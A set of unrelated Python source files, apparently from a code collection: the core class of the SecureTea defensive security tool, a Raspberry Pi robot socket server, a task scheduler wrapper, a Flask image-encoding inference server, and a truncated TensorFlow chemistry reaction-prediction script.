from securetea.lib.history_logger.secureTeaHistoryLogger import SecureTeaHistoryLogger
from securetea.lib.history_logger.historylogger_logger import HistoryLogger
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
Collects the arguments passed and calls the respected module accordingly
for parsing the arguments. Further, creates object for the demanded
notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
try:
args_dict = argsHelper.check_args()
except KeyboardInterrupt:
print('\nKeyboard Interrupt detected. \nQuitting....')
exit(0)
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.history_logger = self.cred['history_logger']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.malware_analysis_provided = args_dict['malware_analysis']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.whatsapp_provided = args_dict['whatsapp_provided']
self.social_eng_provided = args_dict['social_eng_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.waf_provided=args_dict["waf_provided"]
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided and not self.cred['skip_config_file']:
credentials.save_creds(self.cred)
elif not self.cred['skip_config_file']:
self.cred = credentials.get_creds(args)
try:
if self.cred['social_eng']:
self.social_eng_provided = True
except KeyError:
self.logger.log(
"Social Engineering configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['malware_analysis']:
self.malware_analysis_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Malware analysis configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['whatsapp']:
self.whatsapp_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Whatsapp configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided and not (self.cred['history_logger'] or self.cred['clamav'] or self.cred['yara']):
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Welcome to SecureTea..!! Initializing System",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
# Avoid duplicating processes already started by server mode: disable the corresponding feature flags
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.waf_provided=False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
# Avoid duplicating processes already started by system mode: disable the corresponding feature flags
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
self.ids_provided = False
# Check for Social Engineering
if self.social_eng_provided:
self.logger.log(
"Starting SecureTea Social Engineering",
logtype="info"
)
self.social_eng_obj = SecureTeaSocialEngineering(debug=self.cred["debug"], email_id=self.cred["social_eng"]["email"])
self.social_eng_obj.start()
# Check for History Logger
if self.history_logger:
self.logger.log(
"Starting SecureTea History Logger",
logtype="info"
)
self.history_logger_obj = SecureTeaHistoryLogger(debug=self.cred["debug"])
self.history_logger_obj.start()
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
# Avoid duplicating processes already started by IoT mode: disable the corresponding feature flags
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.malware_analysis_provided:
self.malware_analysis_obj = SecureTeaMalwareAnalysis(self.cred['malware_analysis'])
self.malware_analysis_obj.runner()
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Welcome to SecureTea..!! Initializing System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.whatsapp_provided:
self.whatsapp = secureTeaWhatsapp.SecureTeaWhatsapp(
self.cred['whatsapp'],
self.cred['debug']
)
if not self.whatsapp.enabled:
self.logger.log(
"Whatsapp not configured properly.",
logtype="error"
)
else:
self.whatsapp.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.waf_provided:
try:
if self.cred['waf']:
waf_obj=SecureTeaWaf.SecureTeaWaf(cred=self.cred['waf'],debug=self.cred["debug"])
waf_obj.startWaf()
except KeyError:
self.logger.log(
"WAF parameter not configured ",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided or self.cred['clamav'] or self.cred['yara']:
if self.cred.get('antivirus',0):
antivirus = self.cred['antivirus']
else:
antivirus = {}
antivirus['update'] = False
antivirus['custom-scan'] = False
antivirus['auto-delete'] = False
antivirus['monitor-usb'] = False
antivirus['monitor-file-changes'] = False
antivirus['virustotal-api-key'] = ''
try:
antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus, use_clamav=self.cred['clamav'], use_yara=self.cred['yara'])
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via whatsapp account
if self.whatsapp_provided:
self.whatsapp.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
while(1):
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting mouse event listener
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
|
server-tad-pi-v3.py
|
#!/usr/bin/python
from Adafruit_PWM_Servo_Driver import PWM
import socket
from multiprocessing import Process, Manager
import time
import sys
import RPi.GPIO as GPIO
import os
'''
!!!THIS IS FOR LOCALHOST TESTING!!!
Written by Gunnar Bjorkman to control a robot via raspberrypi
Current design:
* Uses PWM Pi Hat (from adafruit) to control many motors and servos
* Receives client's inputs and sends server/robot info to client over socket
connection.
* Controls ESCs and servos that are plugged into the GPIO ports on the
raspberrypi.
* Uses TCP bi-directional connection (both server and client can send and
receive data).
* Multiprocessing so the server can listen for messages and control the
robot simultaneously.
Copy file over ssh to raspberrypi:
scp {PATH TO THIS} pi@raspberrypi:~/Desktop/
*** this exact command is for my computer only, use: ***
scp ~/Documents/Code/python/gunn-pi/{THIS}.py pi@raspberrypi:~/Desktop/
'''
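# Illustrative client-side sketch (added for clarity; not part of the original
# robot code). It assumes the wire format that messageCatcher() below parses:
# "data: <x> <y> <z> <switch> <button11> <button12>;" sent over the TCP socket,
# with the server answering "battery:<level>;" and "ping;". The hostname here
# is a placeholder.
def _example_send_inputs(x, y, z, switch, b11, b12, host='raspberrypi', port=6762):
    c = socket.socket()
    c.connect((host, port))
    c.sendall("data: %f %f %f %f %d %d;" % (x, y, z, switch, b11, b12))
    reply = c.recv(1024)
    c.close()
    return reply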
### Server Stuff
SERVER = "0.0.0.0" # 169.254.209.111
PORT = 6762
s = socket.socket()
s.bind((SERVER, PORT))
s.listen(1024)
def messageCatcher(inputs, _):
while True:
c, addr = s.accept() # Establish connection with client.
try:
print 'client connected:'+str(addr)
while True:
data = c.recv(1024)
#print data
if data.startswith("data:"):
data, _ = data.split(';', 1)
_, x_axis, y_axis, z_axis, switch_axis, button_11, button_12 = data.split()
inputs['x_axis'] = float(x_axis)
inputs['y_axis'] = float(y_axis)
inputs['z_axis'] = float(z_axis)
inputs['switch_axis'] = float(switch_axis)
inputs['button_11'] = int(button_11)
inputs['button_12'] = int(button_12)
c.sendall("battery:"+str(inputs['battery'])+";")
if data:
c.sendall('ping;')
else:
print 'Connection died'
break
finally:
c.close()
def mainProcess(inputs, _):
### Variables global to the main process
# Base Control
pwm = PWM(0x40)
pwm.setPWMFreq(60)
# Negates inputs within the threshold and returns remaining values as
# their corresponding -1 through 1 values. And rounds to two decimals.
#
# Only useful for analog/axial inputs
def inputFilter(x):
thresh_hold = 0.1
if x < 0:
thresh_hold = -thresh_hold
x = min(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
else:
x = max(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
return round(x, 2)
while True:
# Filter the inputs through 'inputFilter()'
x_axis = -1 * inputFilter(inputs['x_axis'])
y_axis = -1 * inputFilter(inputs['y_axis'])
z_axis = -1 * inputFilter(inputs['z_axis'])
switch_axis = inputFilter(inputs['switch_axis'])
print(x_axis)
print(y_axis)
print(z_axis)
print(switch_axis)
horizontal_power = (x_axis * 4) + 7
vertical_power = (y_axis * 4) + 7
print("longitudinal movement: " + str(vertical_power))
print("strafe movement: " + str(horizontal_power))
print(" ")
#MAX = 650
#MIN = 150
motor_speed_PWM = int(x_axis * 240 + 405)
print motor_speed_PWM
pwm.setPWM(0, 0, motor_speed_PWM)
# Mecanum-Wheel equation
#m1_duty_cycle = min(11, max(3, ((y_axis - x_axis - z_axis) * 4) + 7))
#m3_duty_cycle = min(11, max(3, ((y_axis - x_axis + z_axis) * 4) + 7))
#m2_duty_cycle = min(11, max(3, ((y_axis + x_axis - z_axis) * 4) + 7))
#m4_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
# Omni-Wheel equation
# m1_duty_cycle = min(11, max(3, (-1 * (x_axis - (-1 * z_axis)) * 4) + 7))
# m3_duty_cycle = min(11, max(3, ( 1 * (x_axis + (-1 * z_axis)) * 4) + 7))
# m2_duty_cycle = min(11, max(3, (-1 * (y_axis - (-1 * z_axis)) * 4) + 7))
# m4_duty_cycle = min(11, max(3, ( 1 * (y_axis + (-1 * z_axis)) * 4) + 7))
# Lift speed
#mL_duty_cycle = min(11, max(3, ((switch_axis) * 4) + 7))
# Sweeper drum speed
#mS_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
#print("Motor 1: " + str(m1_duty_cycle))
#sH.ChangeDutyCycle(sH_duty_cycle)
#m1.ChangeDutyCycle(horizontal_power) # between 2.5 & 12.5
time.sleep(0.05)
os.system('clear') # Clear screen for Mac and Linux
if __name__ == "__main__":
manager = Manager()
inputs = manager.dict()
inputs['x_axis'] = 0
inputs['y_axis'] = 0
inputs['z_axis'] = 0
inputs['switch_axis'] = 0
inputs['battery'] = 0
# - multiprocessing runs a separate instance of python, typical
# global variables are not shared between child processes
mC = Process(target=messageCatcher, args=(inputs, 1))
mP = Process(target=mainProcess, args=(inputs, 1))
mC.start()
mP.start()
mC.join()
mP.join()
|
tasks.py
|
import json, threading
import apscheduler
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.triggers.interval import IntervalTrigger as trigger
from apscheduler import events
from time import sleep
from components.logger import Logger
from datetime import datetime
class Tasks:
def __init__(self, Database):
self.logger = Logger("Tasks").logger
self.db = Database
#self.schedule = AsyncIOScheduler()
self.schedule = BackgroundScheduler()
self.threadlist = []
self.uilist = []
def createtask(self, functarget, count, unit, tag="[module]"):
#task = getattr(schedule.every(count), unit).do(functarget).tag(tag)
kwargs = {unit: count}
self.logger(f"scheduled module {tag} to run every {count} {unit}", "debug")
task = self.schedule.add_job(functarget, trigger(**kwargs), jitter=10, misfire_grace_time=None)
#self.logger(task, "debug")
return task
def createthreadedtask(self, functarget, argdict={}):
task = threading.Thread(target=functarget, kwargs=argdict)
#task = self.schedule.add_job(task.start)
self.threadlist.append(task)
return task
def removetask(self, task):
self.logger(f"Removing task: {task}", "debug")
task.remove()
def pause(self, target):
# check if target in membase. if so, stop execution
taskdict = self.db.membase["taskdict"]
if target in taskdict and "task" in taskdict[target]:
job = taskdict[target]["task"]
job.pause()
self.logger(f"Paused: {target}")
def resume(self, target):
taskdict = self.db.membase["taskdict"]
if target in taskdict and "task" in taskdict[target]:
job = taskdict[target]["task"]
job.resume()
self.logger(f"Resumed: {target}")
def run(self):
self.logger("running everything")
for task in self.threadlist:
task.start()
self.schedule.start()
def getjobs(self):
self.schedule.print_jobs()
return self.schedule.get_jobs()
def getjobname(self, jobid=None):
tmpjoblist = self.schedule.get_jobs()
jobdict = {}
for job in tmpjoblist:
name = job.name
job = job.id
jobdict[job] = name
if jobid in jobdict:
name = jobdict[jobid]
classname, funcname = name.split(".")
return classname, funcname
return 404, 404
def addlistener(self, function):
self.schedule.add_listener(function, mask=4096)
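# Illustrative usage sketch (added for clarity; `database` and `poller.poll`
# are placeholders — pause()/resume() above expect the Database object to
# expose a membase["taskdict"] mapping of tag -> {"task": job}):
#
#   tasks = Tasks(database)
#   job = tasks.createtask(poller.poll, 5, "minutes", tag="[poller]")
#   database.membase["taskdict"]["[poller]"] = {"task": job}
#   tasks.run()   # starts any queued threads and the background scheduler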
|
server_inference.py
|
import argparse
import torch
import numpy as np
import sys
import os
import dlib
import PIL
import threading
import flask
import queue
import io
sys.path.append(".")
sys.path.append("..")
from configs import data_configs, paths_config
from utils.model_utils import setup_model
from utils.alignment import align_face, NumberOfFacesError
dlib_shape_predictor = dlib.shape_predictor(paths_config.model_paths['shape_predictor'])
PIL.Image.MAX_IMAGE_PIXELS = 8192 * 4096 # protect against decompression bomb DOS attacks
app = flask.Flask(__name__)
job_queue = queue.Queue()
class EncodeJob:
def __init__(self, img, name, align):
self.img = img
self.align = align
self.name = name
self.evt = threading.Event()
self.did_align = False
def __str__(self):
return self.name
def set_result(self, latent):
self.latent = latent
self.evt.set()
def wait_for_result(self, timeout):
if self.evt.wait(timeout):
return self.latent
else:
return None
@app.route('/api/encodeimage/', methods=['POST'])
def encode_image():
tryalign = flask.request.form.get('tryalign', 'false')
do_align = tryalign.lower() == 'true'
file = flask.request.files['usrimg']
if not file:
return flask.Response('No file uploaded for usrimg', status=400)
img = PIL.Image.open(file.stream)
img = img.convert("RGB") # processing steps are expecting an RGB image
job = EncodeJob(img, 'user uploaded file', do_align)
job_queue.put(job)
latent = job.wait_for_result(15)
if latent is None:
raise Exception("Encoding image failed or timed out")
did_align = job.did_align == True
return flask.jsonify({'dlatent': latent.tolist(), 'did_align': did_align})
def run_alignment(img):
try:
aligned_image = align_face(filepath=None, predictor=dlib_shape_predictor, img=img)
print("Aligned image has shape: {}".format(aligned_image.size))
return aligned_image
except NumberOfFacesError:
return None
def get_latents(net, x, is_cars=False):
codes = net.encoder(x)
if net.opts.start_from_latent_avg:
if codes.ndim == 2:
codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1)[:, 0, :]
else:
codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1)
if codes.shape[1] == 18 and is_cars:
codes = codes[:, :16, :]
return codes
def get_all_latents(net, batches, is_cars=False):
all_latents = []
with torch.no_grad():
for batch in batches:
x = batch
inputs = x.to(device).float()
latents = get_latents(net, inputs, is_cars)
all_latents.append(latents)
return torch.cat(all_latents)
def get_batch(batchsize):
yield job_queue.get(True) # will block until it gets a job
for i in range(batchsize-1):
if not job_queue.empty():
yield job_queue.get_nowait()
def worker(ckpt, batch_size):
net, opts = setup_model(ckpt, device)
is_cars = 'car' in opts.dataset_type
dataset_args = data_configs.DATASETS[opts.dataset_type]
transforms_dict = dataset_args['transforms'](opts).get_transforms()
transform = transforms_dict['transform_inference']
print("Worker ready")
while True:
jobs = list(get_batch(batch_size))
app.logger.info(f"Running jobs {[str(job) for job in jobs]}")
imgs = []
for job in jobs:
if job.align:
aligned = run_alignment(job.img)
if aligned is None:
imgs.append(job.img)
else:
imgs.append(aligned)
job.did_align = True
else:
imgs.append(job.img)
batch = torch.stack([transform(img) for img in imgs])
latents = get_all_latents(net, [batch], is_cars=is_cars)
latents = latents.cpu()
for latent, job in zip(latents, jobs):
job.set_result(np.array(latent))
app.logger.info("Finished batch job")
def main(args):
t1 = threading.Thread(target=worker, args=[args.ckpt, args.batch])
t1.daemon = True # kill thread on program termination (to allow keyboard interrupt)
t1.start()
app.config['TEMPLATES_AUTO_RELOAD'] = True # for debugging
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # limit to 16mb
app.run(host="0.0.0.0", port=args.api_port)
app.logger.info("Closing server_inference")
if __name__ == "__main__":
device = "cuda"
parser = argparse.ArgumentParser(description="Run a flask server to do e4e inference on images")
parser.add_argument("--batch", type=int, default=1, metavar="BATCH_SIZE", help="batch size for the generator")
parser.add_argument("--api-port", type=int, default=8080, metavar="PORT", help="port to listen on (default 8080)")
parser.add_argument("--ckpt", default="pretrained_models/e4e_ffhq_encode.pt", metavar="CHECKPOINT", help="path to generator checkpoint")
args = parser.parse_args()
main(args)
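# Illustrative client sketch (added for clarity; not part of the original
# server). It posts an image to the /api/encodeimage/ route defined above,
# assuming the server listens on localhost:8080 and that the `requests`
# package is available; "face.jpg" is a placeholder filename.
#
#   import requests
#   with open("face.jpg", "rb") as fh:
#       resp = requests.post("http://localhost:8080/api/encodeimage/",
#                            data={"tryalign": "true"},
#                            files={"usrimg": fh})
#   latent = resp.json()["dlatent"]        # nested list of latent codes
#   aligned = resp.json()["did_align"]     # whether face alignment was applied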
|
oracletest.py
|
import tensorflow as tf
from utils.nn import linearND, linear
from mol_graph import atom_fdim as adim, bond_fdim as bdim, max_nb, smiles2graph, smiles2graph_test, bond_types
from models import *
import math, sys, random
from optparse import OptionParser
import threading
from multiprocessing import Queue
import rdkit
from rdkit import Chem
TOPK = 5
parser = OptionParser()
parser.add_option("-t", "--test", dest="test_path")
parser.add_option("-p", "--cand", dest="cand_path", default=None)
parser.add_option("-a", "--ncand", dest="cand_size", default=500)
parser.add_option("-c", "--ncore", dest="core_size", default=10)
parser.add_option("-m", "--model", dest="model_path")
parser.add_option("-w", "--hidden", dest="hidden_size", default=100)
parser.add_option("-d", "--depth", dest="depth", default=1)
opts,args = parser.parse_args()
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
core_size = int(opts.core_size)
MAX_NCAND = int(opts.cand_size)
#gpu_options = tf.GPUOptions(allow_growth=True)
#session = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
session = tf.Session()
_input_atom = tf.placeholder(tf.float32, [None, None, adim])
_input_bond = tf.placeholder(tf.float32, [None, None, bdim])
_atom_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_bond_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_num_nbs = tf.placeholder(tf.int32, [None, None])
_src_holder = [_input_atom, _input_bond, _atom_graph, _bond_graph, _num_nbs]
q = tf.FIFOQueue(100, [tf.float32, tf.float32, tf.int32, tf.int32, tf.int32])
enqueue = q.enqueue(_src_holder)
input_atom, input_bond, atom_graph, bond_graph, num_nbs = q.dequeue()
input_atom.set_shape([None, None, adim])
input_bond.set_shape([None, None, bdim])
atom_graph.set_shape([None, None, max_nb, 2])
bond_graph.set_shape([None, None, max_nb, 2])
num_nbs.set_shape([None, None])
graph_inputs = (input_atom, input_bond, atom_graph, bond_graph, num_nbs)
with tf.variable_scope("mol_encoder"):
fp_all_atoms = rcnn_wl_only(graph_inputs, hidden_size=hidden_size, depth=depth)
reactant = fp_all_atoms[0:1,:]
candidates = fp_all_atoms[1:,:]
candidates = candidates - reactant
candidates = tf.concat(0, [reactant, candidates])
with tf.variable_scope("diff_encoder"):
reaction_fp = wl_diff_net(graph_inputs, candidates, hidden_size=hidden_size, depth=depth)
reaction_fp = reaction_fp[1:]
reaction_fp = tf.nn.relu(linear(reaction_fp, hidden_size, "rex_hidden"))
score = tf.squeeze(linear(reaction_fp, 1, "score"), [1])
tk = tf.minimum(TOPK, tf.shape(score)[0])
_, pred_topk = tf.nn.top_k(score, tk)
